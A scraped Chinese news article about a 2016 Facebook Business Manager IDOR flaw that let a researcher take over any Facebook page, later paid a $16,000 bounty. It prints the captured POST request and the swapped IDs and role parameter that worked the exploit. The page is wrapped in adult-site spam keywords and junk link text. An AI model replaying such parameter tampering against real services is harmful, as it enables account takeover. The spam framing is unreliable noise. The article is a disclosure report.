成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

十秒內(nèi)黑掉Facebook主頁?這個漏洞竟然價值1.6萬美金(含漏洞分析)

安全 漏洞
Sureshkumar在Facebook的企業(yè)管理平臺中發(fā)現(xiàn)了一個IDOR(InsecureDirect Object References)漏洞,而在這個漏洞的幫助下,他可以在十秒之內(nèi)獲取到任意Facebook主頁的控制權(quán)。

[[171789]]

如何黑掉你的Facebook?這位來自印度的安全研究專家表示有話要說。根據(jù)國外媒體的最新報道,一位名叫ArunSureshkumar的印度安全專家在Facebook的“企業(yè)管理平臺”(BusinessManager)中發(fā)現(xiàn)了一個嚴重的漏洞,攻擊者可以利用該漏洞來攻擊任何人的Facebook主頁。

Facebook的企業(yè)管理平臺(BusinessManager)是什么?

“企業(yè)管理平臺”可以幫助企業(yè)、廣告代理商、或行銷人員在統(tǒng)一界面下集中管理企業(yè)旗下的Facebook主頁、廣告賬號、以及付款方式,從而避免了管理人員需要不斷切換界面的尷尬局面。

[[171790]]

大型企業(yè)旗下通常會有多個Facebook粉絲主頁,而這些主頁又各自有不同的市場定位和目標。對于企業(yè)管理者而言,“企業(yè)管理平臺”可以幫助他們在同一界面下管理所有的粉絲專頁和廣告賬號,不僅如此,他們還可以查看、移除、或變更相應(yīng)用戶的權(quán)限。

而各個Facebook粉絲專頁的管理者可以登入“企業(yè)管理平臺”,并直接訪問廣告賬號和主頁的各種信息。此時并不會向雇主顯示所有的Facebook個人資料,僅會顯示姓名、公司名稱、以及廣告賬號等信息,所以管理者不必擔心需要將工作上接觸的人加為Facebook好友。

不安全的直接對象引用

在我們對這一攻擊技術(shù)進行分析之前,請允許我先給大家介紹一下“不安全的直接對象引用”的概念。

根據(jù)OWASP項目(開放式Web應(yīng)用程序安全項目)所提供的定義,當一個Web應(yīng)用程序可以根據(jù)用戶提供的輸入信息來向用戶提供對象的直接訪問,那么這就是一種不安全的直接對象引用。這個漏洞的存在,將允許攻擊者繞過系統(tǒng)的身份驗證機制,并直接訪問到網(wǎng)絡(luò)系統(tǒng)中的所有資源。

根據(jù)OWASP項目官方提供的信息

“不安全的直接對象引用將允許攻擊者繞過系統(tǒng)的身份驗證機制,并可以通過修改對象的引用參數(shù)值來直接訪問系統(tǒng)資源。這些資源有可能是屬于其他用戶的數(shù)據(jù)庫數(shù)據(jù),也有可能是存儲在文件系統(tǒng)中的文件。如果Web應(yīng)用程序在沒有對用戶的輸入數(shù)據(jù)進行安全檢測的情況下直接向用戶提供了請求對象的訪問權(quán)限,那么就會出現(xiàn)這種不安全的情況。”

Facebook漏洞分析

Sureshkumar在Facebook的企業(yè)管理平臺中發(fā)現(xiàn)了一個IDOR(InsecureDirect Object References)漏洞,而在這個漏洞的幫助下,他可以在十秒之內(nèi)獲取到任意Facebook主頁的控制權(quán)。

Sureshkumar用他的Facebook賬號(ID=907970555981524)添加了一個測試賬號(作為partner賬號),這個partner賬號的ID為991079870975788。他在測試中使用了BurpSuite來攔截Facebook的網(wǎng)絡(luò)請求信息,并且修改了請求中的部分數(shù)據(jù)。

Sureshkumar在他發(fā)表的分析報告中公布了包含漏洞的網(wǎng)絡(luò)請求數(shù)據(jù):

  1. POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1 
  2. Host: business.facebook.com 
  3. Connectionclose 
  4. Content-Length: 436 
  5. Origin: https://business.facebook.com 
  6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 
  7. Content-Type: application/x-www-form-urlencoded 
  8. Accept: */* 
  9. Referer:https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524 
  10. Accept-Encoding: gzip, deflate, br 
  11. Accept-Language: en-US,en;q=0.8 
  12. Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB;sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA;c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837;fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I;csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2;presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC;act=1472469233458%2F6 
  13. parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733 

那么拿到這些數(shù)據(jù)之后,怎么才能攻擊Facebook主頁呢?

他用目標Facebook賬號的ID值替換了請求數(shù)據(jù)中“asset_id”參數(shù)值,然后交換了“parent_business_id”和“agency_id”的值。除此之外,他還將“role”參數(shù)的值修改成了“MANAGER”。

  1. parent_business_id= 991079870975788 
  2. agency_id= 907970555981524 
  3. asset_id =190313461381022 
  4. role= MANAGER 

通過上述這一系列操作之后,Sureshkumar演示了如何攻擊Facebook主頁,并獲取到了企業(yè)管理平臺頁面的管理員權(quán)限。除此之外,Sureshkumar還發(fā)布了一段攻擊演示視頻。

PoC視頻:

https://youtu.be/BSnksWX5Kn0 

結(jié)束語

[[171791]]

這位來自印度的安全研究專家于2016年8月29日正式將該漏洞提交給了Facebook。Facebook的安全技術(shù)人員對該漏洞進行了分析,并且在調(diào)查過程中還意外發(fā)現(xiàn)了平臺中的另外一個安全漏洞。

根據(jù)Facebook的漏洞獎勵計劃,這位社交網(wǎng)絡(luò)中的巨頭向Sureshkumar提供了一萬六千美元的漏洞獎金。這個漏洞竟然價值1.6萬美金,請問各位BugHunter心動了嗎?

責任編輯:武曉燕 來源: FreeBuf
相關(guān)推薦

2015-10-22 23:14:54

2012-03-08 09:18:29

2009-05-22 15:46:09

Facebook應(yīng)用驗證漏洞

2020-06-02 14:28:46

漏洞黑客網(wǎng)絡(luò)攻擊

2012-02-29 09:22:19

2021-03-04 14:55:50

微軟漏洞黑客

2013-03-15 10:15:21

2016-03-10 20:00:57

2014-12-03 10:37:45

2021-02-23 10:43:42

Facebook Ga

2024-09-27 15:57:08

2017-11-23 10:47:47

2015-02-06 15:51:11

2025-05-12 01:00:00

2024-05-06 10:11:51

2022-01-04 08:33:33

Kafka消息發(fā)送

2021-01-27 10:35:23

漏洞安全KindleDrip攻

2022-07-27 15:50:55

漏洞網(wǎng)絡(luò)攻擊

2015-08-14 13:37:46

DEFCON磁盤安全

2015-09-25 16:18:36

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 精品中文视频 | 久久精品无码一区二区三区 | 欧美日韩在线电影 | 91在线视频播放 | 国产 日韩 欧美 在线 | 日本成人在线网址 | 四虎成人免费视频 | av看片网站 | 国产乱肥老妇国产一区二 | 成人久久18免费网站麻豆 | 男女网站免费 | 成人免费网站 | 成人在线精品视频 | 久久久久久免费免费 | 欧美一区二区 | 久草视频网站 | 欧美精品一区在线发布 | 亚洲小视频在线观看 | 亚洲婷婷一区 | 精品无码久久久久久国产 | av在线三级| 男女视频在线观看免费 | 国产精品久久久久久久久久久久冷 | 欧美a级成人淫片免费看 | 亚洲精品一区中文字幕乱码 | 欧美高清性xxxxhdvideosex | 国产一区中文字幕 | 亚洲精品99 | 久久精品免费 | 精品亚洲一区二区 | 国产蜜臀97一区二区三区 | 91资源在线 | 亚洲精品久久嫩草网站秘色 | 国产精品中文字幕在线播放 | 黄色一级片aaa | 狠狠干美女| 久久久精品视 | 免费在线观看毛片 | 免费观看的av | 国产激情视频网址 | 中文字幕亚洲精品 |